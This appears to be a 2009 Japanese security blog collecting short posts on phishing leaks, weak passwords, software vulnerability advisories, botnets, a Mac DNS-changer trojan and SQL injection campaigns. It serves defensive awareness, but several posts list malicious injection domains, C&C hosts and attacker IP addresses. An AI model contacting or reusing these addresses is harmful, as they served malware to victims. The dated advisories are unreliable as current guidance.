皮肉なことにそれらの犠牲者の多くは、各個別のアプリケーション・サービスに対して別々で強力なパスワードを設定していましたが、こうしたパスワードへの努力をあざわらうかのごとく、マルウェアはその努力を台無しにしてしまったのです。

いずれにせよ、こうした個人情報が一旦ネット上に流されると回収は難しいため、特にパスワードの使い回しをしていた方は、水平漏洩を防ぐために個人情報の変更を行う必要があります。

Gmailや米Yahoo!メールも情報流出、パスワードの変更を
Gmailにフィッシング攻撃、一部のアカウントのパスワードが流出
GoogleもMicrosoftも、GmailやHotmailのアカウントにメッセージを送ったり、それぞれのメール・サービスに警告文を掲載して、直接ユーザーに危険性を通知してはいない。

うんうん、そんなことするのはSpammerだけですよね
Microsoft "Your e-mail will be blocked" phish
気をつけましょう。

----------
パスワード弱者

Weak passwords dominate statistics for Hotmail's phishing scheme leak
フィッシング詐欺のデータ流出：脆弱なパスワードが多いことが明らかに
もっともよく使われていたパスワードのトップ10は、次の通りだ。

大半のユーザーが安易なパスワードを利用、流出情報を分析
最も多く見られたパスワードは「123456」「123456789」「alejandra」「111111」が上位を占めた。このほか「alberto」「estrella」などの単語が上位に来ていることから、パスワード流出の原因となったフィッシング詐欺では主に中南米のユーザーが狙われたようだとAcunetixは分析している。
‘Phished’ Password list:- A quick analysis

ま・・Twitter幹部もコレでしたしね・・
Twitter社の皆さん、サーバーのログイン・パスワードに“password”を使わないように

パスワード123456？
F-secureはパスワードをPost-itにメモする方法をお勧め（パスワードの全部の文字列ではない）していますが、これPマーク審査で１発アウトなんですよね（笑）

----------
Wireshark

Wireshark の erf ファイル処理に脆弱性
Wireshark はプロトコルを分析するためのソフトウェアです。Wireshark には、細工された erf ファイル処理に起因する脆弱性が存在します。
あれ？また？

Wireshark 1.2.2 Release Notes
Sep 15, 2009
roger

----------
spam spam spam～

Spam rate increase is seen
As I said, I've noticed a big increase in spam lately in my own personal email as well. What about the rest of the readers? Have you guys experienced similar?

確かにこの２週間くらいspamが増えていますね。今までスパムが全く来なかったメールアカウントも捉えられたりしてIMAPが溢れそうです（苦笑）

----------
IRC is evil... Day of 7

Cyber Security Awareness Month - Day 7 - Port 6667/8/9/7000 - IRC: is it evil?
IRC Port mostly 6667, and 6668,6669 also 7000

いわいる、IRCnet(Wide)やfreenodeのようなリレーチャットが、IMに取って代わられ、現在では廃れているのは間違いありません。そしてその域帯やリソースを悪用するBotnetの多いこと多いこと（苦笑）

Things to keep in mind about this very simple method of finding IRC on the network, if you allow IRC on your network, you are going to get tons and tons of alerts...
はい、会社のPCで直ではとても使えませんよ

----------
DNSSEC will build 1st milestone Dec.1

First root server provides a DNSSEC-signed zone as of December 1st
次世代DNS、DNSSECの最初のRootServerが、12.1に稼動を開始すると、Ripe-59thで発表されました。
これによれば、VeriSignの持つTLD(.com/.net)のDNSSEC移行は 20010.07.01 に完了する模様。これに併せて ICANN も移行を完遂させる予定です。

VeriSign sees a great advantage in this distribution of authority. It would also address the fears of the international community, which has expressed strong reservations about the US Government wanting to keep hold of the master key.

name service が大きく変わろうとしていますが、日本はどうするんでしょうね。

参考：
ICANNが米政府と新たな合意　独立性高まる

----------
PPPは禁止？

Pay Per Post a.k.a 提灯記事
個人的には限りなくグレーだと思うケド・・

報酬有りのブログでの製品レビューは情報開示を－米連邦取引委員会－
新しいガイドラインでは、無料サンプルや報酬を受けた上でブログに製品レビューを書く場合、その旨を明確に開示することが義務付けられることとなった。これはネットにおけるレビューや製品情報を消費者にとってより正確なものにすることが目的とのこと。新ガイドラインは 12 月 1 日から実施され、違反すれば訴訟や最高 11,000 ドルの罰金などの制裁措置が課せられる場合があるとのことだ。

----------
それはヤバいでしょうに・・

無線 LAN クラックツールが付属する「無料でネットが利用できる機器」、中国で大人気
中国で大ヒット中の「一生ネットが無料になる機器」とは！？

買うなよ~（苦笑）
偽ブランド品やらマジコンと一緒で、所持だけでも犯罪化したほうがよさそうです。

----------
台風来てるのでこの辺で・・・
皆様、くれぐれもお気をつけくださいませ。

Google Safe Browsing STATUS:
[goog-malware-hash 1.16280 update]
[goog-black-hash 1.41694 update]
Results: 339393 (-3754) 最近減少傾向

EoF

--
はい・・今日が水曜日です
ミステリー記念日
1849年10月7日に推理小説の先駆者といわれるエドガー・アラン・ポーが亡くなったことに由来
スーツの日
1666年10月7日にイギリス国王チャールズ2世が衣服改革を宣言したことに由来か。
盗難防止の日
とう(10)なん(7) 日本損害保険協会

----------
週刊脆弱性 2009.10.06 by Hitachi

チェックしておきたいぜい弱性情報＜2009.10.06＞

米シスコ製品群に複数のぜい弱性（2009/09/23）
　→ シスコ：セキュリティ・アドバイザリ
マイクロソフトSMB 2.0のぜい弱性（2009/09/18）
　→ マイクロソフト：回避策を有効にするMicrosoft Fix it 50304
米アップルiTunesのぜい弱性（2009/09/23）
　→ 米アップル：iTunes 9.0.1のセキュリティコンテンツについて
　
[IN ZERO DAY]
Cyber Security Bulletin SB09-264（2009/09/21）
Adobe ShockWave PlayerのActiveXコントロールにバッファ・オーバーフローのぜい弱性（2009/09/18）
え”？
Adobe ShockWave Player 11.5.1.601 ActiveX Buffer Overflow PoC
現在の最新版：Adobe Shockwave Playerのバージョン 11.5.1.601
※Flashでは無い点に注意してください。
AIR(Adobe Insecure Responds)認定書発行
BGM:この脆弱性～何の脆弱性～気になる脆弱性～Ver 1991

----------
Apache 2.2.14 Released

Fixed in Apache httpd 2.2.14

low: mod_proxy_ftp DoS CVE-2009-3094
low: mod_proxy_ftp FTP command injection CVE-2009-3095
moderate: Solaris pollset DoS CVE-2009-2699

あまり致命的な脆弱性ではないようですが、CVEが公開されたので後追い攻撃の可能性もあります。
アップデートを視野に入れたサーバ運用計画を建てましょう。

----------
FFSearcher

ユーザーに全く気付かれない新型クリック詐欺が登場！
この攻撃自体では，その影響が直接的にユーザーに及ぶことはない。ユーザーにとって本当の脅威なのは，既に改ざんされているWebサイトに自分がアクセスすることによって攻撃が始まり，自分がサイバー犯罪に加担することになるという事実だろう。

コレ、Nine-Ball トロイの機能っぽいんですけど、本当に単機能なんでしょうか？
New Click-Fraud Attack Is Stealthiest Yet -- 2009.06.30
FFSearcher Click Fraud Trojan -- 2009.06.26

最近のウィルス(マルウェア)は、感染すると複合的な被害が及ぶので手が付けられないものが多いのですが、Nine-BallとBeladen に関しては、実際のところよくわからないまま終焉してしまった印象があるので、今頃こんなこと言われてもナァというのが正直なトコ（笑）

FFSearcher

----------
20k Credentials spread over TEH world

先日の Windows Liveアカウント流出ですが、Microsoftが認めました。
Phishing scheme affecting some Hotmail customers
We want to provide a quick update, that as a result of our investigation we are taking measures to block access to all of the accounts that were exposed and have resources in place to help those users reclaim their accounts.
とりあえず、流出したアカウントはブロックした模様。

Microsoft recommends customers use the following protective security measures:
Renew their passwords for Windows Live IDs every 90 days
マテ・・・・・MS社員は全員やってるんですか？ソレ！？

Time to change your hotmail/gmail/yahoo password
Hotmailの数千のアカウント情報が流出、フィッシング詐欺が原因か
Windows Live Hotmailのアカウント情報が流出--フィッシング詐欺が原因か 2009/10/6 (CNET Japan)

拡大：
Email phishing attack spreads to Gmail and Yahoo
Neowin can today reveal that more lists are circulating with genuine account information and that over 20,000 accounts have now been compromised. Non-Hotmail passport accounts have been affected too. A new list contains email accounts for Gmail, Yahoo, Comcast, Earthlink and other third party popular web mail services. It's not clear if this is login information for the service itself or the Microsoft Passport passwords.
というわけで、Gmail/Yahoo あたりも、パスワード変更を行ったほうがいいかもしれません。

----------
Warn to paypal user

Null-Prefix Cert の問題が一向に解決されないような感触がありますが・・
Forged PayPal certificate fools IE, Chrome and Safari
The posting of a trick SSL certificate for www.paypal.com and its pertaining private key on the Full Disclosure security mailing list should finally force Microsoft, Google and Apple into releasing updates to fix the NULL prefix vulnerability. Phishers, for example, could use the certificate to disguise their servers as legitimate banking servers – which would only be detected by subjecting the certificate to closer scrutiny. The certificate could also be used for man-in-the-middle attacks in local networks.

paypalを利用中の方は、IE（は当然として・笑）、Chrome、および Safari でのSSL決済をしばらく中止するか、証明書を常に開いて確認するようにしましょう（酷）

----------
Day 6 -- Port 67&68

BOOTP と DHCP
Cyber Security Awareness Month - Day 6 ports 67&68 udp - bootp and dhcp

いまどき BOOTP なんて使ってる人いるんでしょうか？
※だから危険なポートなんでしょうけど

----------
MalwareもSkype経由で

Rogueware distributors use Skype
偽ウイルス対策ソフトの配布、今度はSkypeで

そもそも怪しい人からのコンタクトリスト受付を止めましょうネ

----------
JavaScriptライブラリそのものへのインジェクション

Ajax/Javascriptライブラリにインジェクションされている例

むぅ・・これは検査がいよいよ難しいことに・・・

あと、中国系のインジェクションは .css への注入が多数報告されていますが、具体的な解析は行ってない（会社では出来ない・笑）のでよくわかってません。
※誰かインジェクションの具体例あったら（出来れば日本語か英語で）教えてください。
そろそろ個人環境が欲しいナ

----------
Botnet Threats

何かまた剣呑なモノの流行の兆しがあるようです。

W32/Xpaj Botnet Growing Rapidly
W32/Xpaj
2009.09.24 8/40 (20.00%)
tooratios.com
abdulahuy.com
ATOM86 (82.98.235.0/24) : Netherlands

Inside Trojan.Clampi: Network Communication
参考：(10/01紹介)
Killing the beast...Part 3

----------
最近、記事がだらだらと多いですね・・
ちょっと絞ったほうがいいような気がしてきました。

Google Safe Browsing STATUS:
[goog-malware-hash 1.16256 update]
[goog-black-hash 1.41622 update]
Results: 343147 (-2346)

EoF

[EMERGENCY]
WordPress 2.8.4: Security Release
Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

DOWNLOAD NOW
Version 2.8.4

2.8.3 を使用中の方は直ちにアップデートしてください。

うち？
Wordpress 2.6 から上げてくれませんYO！（号泣

君が代記念日
う・・うちは政治ネタは禁止デス（笑）
茜雲忌(航空安全の日)
日本航空123便墜落事故 (JAL123便墜落までの記録)
ご冥福をお祈りいたします

クレオパトラ7世の命日

----------
[WARNING]
WordpressのAdminパスワードが意図せずにリセットされてしまう危険性

Wordpress unauthenticated administrator password reset

これは PHPの、「データのセットされていない空の連想配列をセットできてしまう」ことを悪用したもので、現時点での回避策はありません。

既に修正がCommitされていますので、じきに改訂版がリリースされるでしょう。

Password-reset flaw haunts WordPress admins



----------
[UPDATE]
Safari 4.0.3
This update is recommended for all Safari users and includes improvements to stability, compatibility and security including:

About the security content of Safari 4.0.3

CVE:
CVE-2009-2468
CVE-2009-2188
CVE-2009-2196(*reserved*)
CVE-2009-2195(*reserved*)
CVE-2009-2200(*reserved*)
CVE-2009-2199(*reserved*)

使用中の方はUPDATEしましょう。

----------
Mac OS X DNS-Changer

Mac OS X DNS-Changing Trojan in the Wild
ネームサービスを不正に変更するトロイの木馬が発見されました。このトロイの木馬は MacOS Xを標的にしており、３月頃はMacCinema Installer という名前で出回っていました。
今回は QuickTimeUpdate.dmg というファイルで QuickTime Player のアップデートを装っています。実行されると正規なドメインを悪意サーバに導き、貴方のインターネットトラフィックを監視されるようになります。

以下のIPアドレスは自信無いけど塞いでおきましょう（誤射かも！？）
85.255.112.81
85.255.112.91
85.255.112.114
85.255.112.233
(or 85.255.112.0/24)

91.214.45.73
94.247.2.109
78.157.142.187
213.163.64.78

New Mac OS X DNS changer spreads through social engineering

Latest Mac Threat: ‘MacCinema’ -- 2009.03.23

Latest Threat: MacCinema -- 2009.03.17

OS X Tips: How To Check Your DNS Settings -- 2009.06.10

Mac環境も安全ではなくなりつつあります。

----------

EoF

設立 1899年（明治32年）7月17日
へぇ～

----------

Firefox 3.5.1 release soon

今すぐ最新版へ更新しましょう。

Firefox 3.5.1リリース
http://download.mozilla.org/?product=firefox-3.5.1&os=win&lang=ja
Thanks for helping us beta test Firefox 3.5.1

一応まだベータ版という位置づけのようですが、すでにdownloadセクションに入っていますので、気の早い人は最新版へupdateし、javascript.options.jit.contentをfalseにしている方は true に戻しましょう。
戻さないとJavaScriptがモッサリしますｗ

参考：
Mozilla Firefox Memory Corruption Vulnerability
Mozilla Firefox Font HTML Tags Remote Code Execution
Firefox 3.5に深刻な脆弱性、セキュリティパッチ公開まで「回避策」を

----------

昨日の Java JRE関連ですが

古いバージョンのJava Runtime Environmentはアンインストールしてもよい

正確には、古いバージョンが残ってしまう点が問題です。
「最新バージョンのJava Runtime Environment（JRE）には、旧バージョンのアップデートが含まれています。アプリケーションやアプレットの中には、JREの特定のバージョン用に記述およびテストされたものもあります。
そのため、旧バージョンのJREも残しておく方が理想ですが、ディスク容量が不足している場合は、アンインストールしてもかまいません。」
つまり、HDDに残っている古いJREがコールされる可能性があるということです。

脆弱性のあるバージョンを残しておくことに意味はありませんので確実に消去しましょう。

----------

チェックしておきたいぜい弱性情報＜2009.07.16＞
VMware ESXサービスコンソールのアップデート（2009/07/10）
ColdFusion 8に同こんされているFCKEditorの入力処理のぜい弱性（2009/07/08）
Cyber Security Bulletin SB09-187（2009/07/06）
■レッドハットsnmpdにサービス不能を伴うぜい弱性（2009/06/26）
■サン・マイクロシステムズSolaris 10，OpenSolarisに複数のぜい弱性（2009/07/01）

VMwareは特に判りにくいので注意してください。
というか多すぎ！

----------

SANSの人ってGeekばっかりかと思ってました、ごめんなさい

「サプライチェーン攻撃」などがセキュリティ上の最大の脅威に----米SANSの専門家が指摘

サプライチェーン攻撃
聞きなれない言葉ですね
偽ルータによる「サプライチェーン攻撃」とは、米SANS代表が解説
海外で製造されたCisco製ルータの偽物が米国内で出回ったことを挙げた。パーラー氏によれば、正規製品が1375ドルであるのに対して、偽物は234ドル。偽物が販売された理由は「単なる金儲けのため」と指摘する一方で、「偽ルータが製造された国の政府はアナウンスを出ていないが、国家ぐるみの行為と見ている」という。

さらに、「ある国家が偽ルータを使って通信を遮断すれば、相手国のIT環境を混乱させることもできる」と懸念を示した上で、「実際に世界中のさまざまな国の政府は、他国のコンピュータを乗っ取りたいと考えている。偽ルータのようなサプライチェーン攻撃を政府が認めれば、企業は堂々と犯罪を行える」と語った。

それって何てサイバーテロ・・・

----------

ZERO-DAY攻撃がSQLインジェクションに転用

OWC exploits used in SQL injection attacks
While a day ago reports of exploits for this vulnerability were still a bit rare, yesterday Ken Hoover sent a log of an SQL injection attempt to his web site. The SQL injection attempt looks very much like the one we've been seeing for month – the attacker blindly tries to inject obfuscated SQL code:

あの手この手でよくもまぁ・・

Injection Domain/IP

f1y.in

なんだこのAレコードの数は（苦笑）

www.jatrja.com
not available

js.tongji.linezing.com

トロイ本体：
File msn.exe received on 2009.07.16 08:34:22 (UTC) Result: 15/41 (36.59%)
Trojan.Dropper, Mal/Behav-112, TrojanDownloader:Win32/Bakted.A
C&C
www.gamecj.com
98.126.12.90

参考：
インジェクション -- FFXI(仮)

----------

最近沈黙していた ScanSafeですが

Is Malware Changing the Web?
On July 6th, we noted that malware-laced ads had plagued PirateBay and other torrent and ROM sites. One of the malware domains involved in those attacks, microsotf.cn, continues to factor prominently in a wave of ongoing compromises believed to be the result of stolen FTP credentials.
The Pirate Bayはスウェーデンの有名なTorrent Trackerサイトで、つい最近有罪判決を受けたにもかかわらず、ネカフェ経営の会社に身売りし、一転して合法企業に転身を図るなど、なかなかに話題を振りまいてくれるサイトです。

その PirateBayの検索結果(SERP)にMalwareサイトが上位に現れ、Koobface 系のMalwareを撒布していると ScanSafeが警告しています。
これらの攻撃の80%が Googleの検索によるもので、5% が Yahoo, 3% が Bing そして 1% が AOLだったとしています。

この辺はサーチエンジンの使われ方に直結しています。たとえば、日本国内ではまだ50%のシェアをYahooが握っているとWeb調査会社は言っていますが、ウチの検索の80%は Googleに因るものです。

Is this an early indicator that website operators are taking a more insular approach? And if so, is it the result of ongoing Web malware attacks?
Web運営者が早期警戒を行っている・・・？
まぁ・・中にはいらっしゃるかもしれませんが（苦笑）
結果的に陥落サイトの数が減らないことがその答えになっています。

updatedate.cn

microsotf.cn
not available

trughtsa.com
not available

----------

Twitterの情報流出で問われるクラウドの安全性

TechCrunchの記事：
Twitter社の皆さん、サーバーのログイン・パスワードに“password”を使わないように

Password = "password" だったのかＹＯ！

password強度に関わる問題は本当に難しいです。
自分の知人のPCを設定する際にも、Passwordを何にするか？　どこに保管するか？でいつも時間を食われますね。

関連：
Twitterの機密情報流出――幹部のメールアカウントハッキングから
Twitterの説明によると、1カ月ほど前にある幹部社員の個人メールアカウントがハッキングされ、このアカウント経由でTwitterが社内情報共有に利用しているGoogle Appsの文書が盗まれたという。ハッキング発覚後、同社はセキュリティ監査を行い、従業員にセキュリティガイドラインの順守を呼び掛けた。

----------

インジェクションサイトのアドレスをWordCloudで

「圧倒的ではないかわが国は！」（違

猫がスパム送信サービスを宣伝中、ロシアの事情とは？
ロシアではスパムが禁止されていないため、スパム送信サービスを宣伝するケースが珍しくないという。

猫がspamを送りました！

----------
EoF